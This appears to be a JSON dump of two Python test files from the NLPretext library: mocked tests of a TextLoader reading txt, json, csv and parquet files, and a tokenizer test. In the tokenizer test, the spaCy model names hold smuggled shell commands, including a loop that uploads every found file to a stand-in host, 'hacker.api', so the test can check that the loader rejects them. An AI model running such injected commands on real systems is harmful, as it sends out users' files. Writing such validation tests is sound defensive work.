    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n# mypy: disable-error-code=\"attr-defined\"\n\nfrom pathlib import Path\nfrom unittest.mock import MagicMock, patch\n\ntry:\n    import dask.bag as db\n    import dask.dataframe as dd\nexcept ImportError as e:\n    raise ImportError(\"please install dask: pip install dask[complete]\") from e\n\ntry:\n    import pandas as pd\nexcept ImportError as e:\n    raise ImportError(\"please install pandas: pip install pandas\") from e\n\nimport pytest\nfrom nlpretext.preprocessor import Preprocessor\nfrom nlpretext.textloader import TextLoader\nfrom pandas.testing import assert_frame_equal\n\n# pylint: disable=protected-access\n\n\n@patch(\"dask.bag.read_text\")\ndef test__read_text_txt_dask(mock_read_text):\n    # Given\n    files_path = \"some_path/to_read.txt\"\n    file_format = \"txt\"\n    encoding = \"utf-8\"\n    text_column = \"text\"\n    mock_read_text.return_value = db.from_sequence([\"This is a text \\n\", \"This is another text \\n\"])\n\n    expected_result = dd.from_pandas(\n        pd.DataFrame({text_column: [\"This is a text\", \"This is another text\"]}),\n        npartitions=2,\n    )\n\n    # 
When\n    dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column)\n    actual_result = dummy_instance._read_text_txt(files_path)\n\n    # Then\n    mock_read_text.assert_called_once_with(files_path, encoding=encoding)\n    assert_frame_equal(expected_result.compute(), actual_result.compute().reset_index(drop=True))\n\n\n@patch(\"pandas.read_fwf\")\ndef test__read_text_txt_pandas(mock_read_text):\n    # Given\n    files_path = \"some_path/to_read.txt\"\n    file_format = \"txt\"\n    encoding = \"utf-8\"\n    text_column = \"text\"\n    mock_read_text.return_value = pd.DataFrame(\n        {text_column: [\"This is a text\", \"This is another text\"]}\n    )\n\n    expected_result = pd.DataFrame({text_column: [\"This is a text\", \"This is another text\"]})\n\n    # When\n    dummy_instance = TextLoader(\n        file_format=file_format,\n        use_dask=False,\n        encoding=encoding,\n        text_column=text_column,\n    )\n    actual_result = dummy_instance._read_text_txt(files_path)\n\n    # Then\n    mock_read_text.assert_called_once_with(\n        str(Path(files_path).absolute()), encoding=encoding, colspecs=[(None, None)]\n    )\n    assert_frame_equal(expected_result, actual_result.reset_index(drop=True))\n\n\n@patch(\"nlpretext._utils.daskloader.dd\")\ndef test__read_text_json_dask(mock_read):\n    # Given\n    files_path = \"some_path/to_read.json\"\n    file_format = \"json\"\n    encoding = \"utf-8\"\n    text_column = \"text\"\n\n    text_ddf = dd.from_pandas(\n        pd.DataFrame({text_column: [\"This is a text\", \"This is another text\"]}),\n        npartitions=2,\n    )\n    mock_read.read_json.return_value = text_ddf\n\n    expected_result = text_ddf[[text_column]]\n\n    # When\n    dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column)\n    actual_result = dummy_instance._read_text_json(files_path)\n\n    # Then\n    
mock_read.read_json.assert_called_once_with(files_path, encoding=encoding)\n    assert_frame_equal(expected_result.compute(), actual_result.compute())\n\n\n@patch(\"nlpretext._utils.pandasloader.read_json\")\ndef test__read_text_json_pandas(mock_read):\n    # Given\n    files_path = \"some_path/to_read.txt\"\n    file_format = \"txt\"\n    encoding = \"utf-8\"\n    text_column = \"text\"\n\n    dummy_instance = TextLoader(\n        file_format=file_format,\n        use_dask=False,\n        encoding=encoding,\n        text_column=text_column,\n    )\n    dummy_instance._read_text_json(files_path)\n\n    # Then\n    mock_read.assert_called_once_with(files_path, encoding=encoding)\n\n\n@patch(\"dask.dataframe.read_csv\")\ndef test__read_text_csv_dask(mock_read_csv):\n    # Given\n    files_path = \"some_path/to_read.csv\"\n    file_format = \"csv\"\n    encoding = \"utf-8\"\n    text_column = \"text\"\n\n    text_ddf = dd.from_pandas(\n        pd.DataFrame({text_column: [\"This is a text\", \"This is another text\"]}),\n        npartitions=2,\n    )\n    mock_read_csv.return_value = text_ddf\n\n    expected_result = text_ddf[[text_column]]\n\n    # When\n    dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column)\n    actual_result = dummy_instance._read_text_csv(files_path)\n\n    # Then\n    mock_read_csv.assert_called_once_with(files_path, encoding=encoding)\n    assert_frame_equal(expected_result.compute(), actual_result.compute())\n\n\n@patch(\"nlpretext._utils.pandasloader.read_csv\")\ndef test__read_text_csv_pandas(mock_read):\n    # Given\n    files_path = \"some_path/to_read.txt\"\n    file_format = \"txt\"\n    encoding = \"utf-8\"\n    text_column = \"text\"\n\n    dummy_instance = TextLoader(\n        file_format=file_format,\n        use_dask=False,\n        encoding=encoding,\n        text_column=text_column,\n    )\n    dummy_instance._read_text_csv(files_path)\n\n    # Then\n    
mock_read.assert_called_once_with(files_path, encoding=encoding)\n\n\n@patch(\"dask.dataframe.read_parquet\")\ndef test__read_text_parquet_dask(mock_read_parquet):\n    # Given\n    files_path = \"some_path/to_read.parquet\"\n    file_format = \"parquet\"\n    encoding = \"utf-8\"\n    text_column = \"text\"\n\n    text_ddf = dd.from_pandas(\n        pd.DataFrame({text_column: [\"This is a text\", \"This is another text\"]}),\n        npartitions=2,\n    )\n    mock_read_parquet.return_value = text_ddf\n\n    expected_result = text_ddf[[text_column]]\n\n    # When\n    dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column)\n    actual_result = dummy_instance._read_text_parquet(files_path)\n\n    # Then\n    mock_read_parquet.assert_called_once_with(files_path, encoding=encoding)\n    assert_frame_equal(expected_result.compute(), actual_result.compute())\n\n\n@patch(\"nlpretext._utils.pandasloader.read_parquet\")\ndef test__read_text_parquet_pandas(mock_read):\n    # Given\n    files_path = \"some_path/to_read.txt\"\n    file_format = \"txt\"\n    encoding = \"utf-8\"\n    text_column = \"text\"\n\n    dummy_instance = TextLoader(\n        file_format=file_format,\n        use_dask=False,\n        encoding=encoding,\n        text_column=text_column,\n    )\n    dummy_instance._read_text_parquet(files_path)\n\n    # Then\n    mock_read.assert_called_once_with(files_path, encoding=encoding)\n\n\n@pytest.mark.parametrize(\n    \"files_path, file_format, encoding, compute_to_pandas, preprocessor, expected_format, raised\",\n    [\n        (\"text_file1.json\", None, None, True, None, \"json\", None),\n        (\"text_file2.json\", \"json\", None, True, None, \"json\", None),\n        (\"text_file3.csv\", None, \"utf-8\", True, None, \"csv\", None),\n        (\"text_file4.csv\", None, None, False, None, \"csv\", None),\n        (\"text_file3.parquet\", None, \"utf-8\", True, None, \"parquet\", None),\n        
(\"text_file4.parquet\", None, None, False, None, \"parquet\", None),\n        (\"text_file5.pdf\", \"pdf\", None, False, None, \"csv\", \"Format not handled\"),\n        (\"text_file6.txt\", None, None, False, Preprocessor(), \"txt\", None),\n        (\n            \"text_file8.txt\",\n            None,\n            None,\n            False,\n            MagicMock(),\n            \"txt\",\n            \"Only NLPretext preprocessors can be specified\",\n        ),\n    ],\n)\n@patch(\"nlpretext.preprocessor.Preprocessor.run\", return_value=\"This is a text\", autospec=True)\n@patch(\"nlpretext.textloader.TextLoader._read_text_json\")\n@patch(\"nlpretext.textloader.TextLoader._read_text_txt\")\n@patch(\"nlpretext.textloader.TextLoader._read_text_csv\")\n@patch(\"nlpretext.textloader.TextLoader._read_text_parquet\")\n@patch(\"nlpretext.textloader.check_text_file_format\")\ndef test_read_text(\n    mock_check_text_file_format,\n    mock__read_text_parquet,\n    mock__read_text_csv,\n    mock__read_text_txt,\n    mock__read_text_json,\n    mock_run,\n    files_path,\n    file_format,\n    encoding,\n    compute_to_pandas,\n    preprocessor,\n    expected_format,\n    raised,\n):\n    # Given\n    text_column = \"text\"\n    if encoding is None:\n        encoding = \"utf-8\"\n\n    if file_format is None:\n        mock_check_text_file_format.return_value = expected_format\n\n    mock_reader_mapping = {\n        \"csv\": mock__read_text_csv,\n        \"txt\": mock__read_text_txt,\n        \"json\": mock__read_text_json,\n        \"parquet\": mock__read_text_parquet,\n    }\n\n    expected_result = dd.from_pandas(\n        pd.DataFrame({text_column: [\"Text with #\", \"Text with  double  space\"]}),\n        npartitions=2,\n    )\n    mock_reader_mapping.get(expected_format).return_value = expected_result  # type: ignore\n\n    # When\n    dummy_textloader = TextLoader(\n        text_column=text_column, encoding=encoding, file_format=file_format\n    )\n\n    if raised is 
None:\n        actual_result = dummy_textloader.read_text(\n            files_path, file_format, encoding, compute_to_pandas, preprocessor\n        )\n\n        # Then\n        if file_format is None:\n            mock_check_text_file_format.assert_called_once_with(files_path)\n\n        mock_reader_mapping[expected_format].assert_called_once_with(files_path)\n\n        if preprocessor is not None:\n            if isinstance(preprocessor, Preprocessor):\n                mock_run.assert_called()\n                preprocessed_texts = [\"Text with\", \"Text with double space\"]\n                mock_run.side_effect = preprocessed_texts\n                expected_result = dd.from_pandas(\n                    pd.DataFrame({text_column: preprocessed_texts}), npartitions=2\n                )\n\n        if not compute_to_pandas:\n            actual_result = actual_result.compute()\n        assert_frame_equal(expected_result.compute(), actual_result)\n\n    else:\n        with pytest.raises(ValueError, match=raised):\n            dummy_textloader.read_text(\n                files_path, file_format, encoding, compute_to_pandas, preprocessor\n            )\n"
  },
  {
    "path": "tests/test_tokenizer.py",
    "content": "import pytest\nfrom nlpretext.token.tokenizer import LanguageNotInstalledError, _load_spacy_model\n\n\n@pytest.mark.parametrize(\n    \"bad_model_name\",\n    [\n        (\"en_core_web_sm; chmod -x hacker\"),\n        (\n            \"fr_core_news_sm | for file in $(find .); \"\n            'do curl_command -X POST -H \"Content-Type: multipart/form-data\" '\n            '-F \"data=@${file}\" https-fake://hacker.api/upload; done'\n        ),\n    ],\n)\ndef test_load_spacy_model_validation(bad_model_name):\n    with pytest.raises(LanguageNotInstalledError) as e:\n        _load_spacy_model(bad_model_name)\n    assert bad_model_name in str(e.value)\n"
  }
]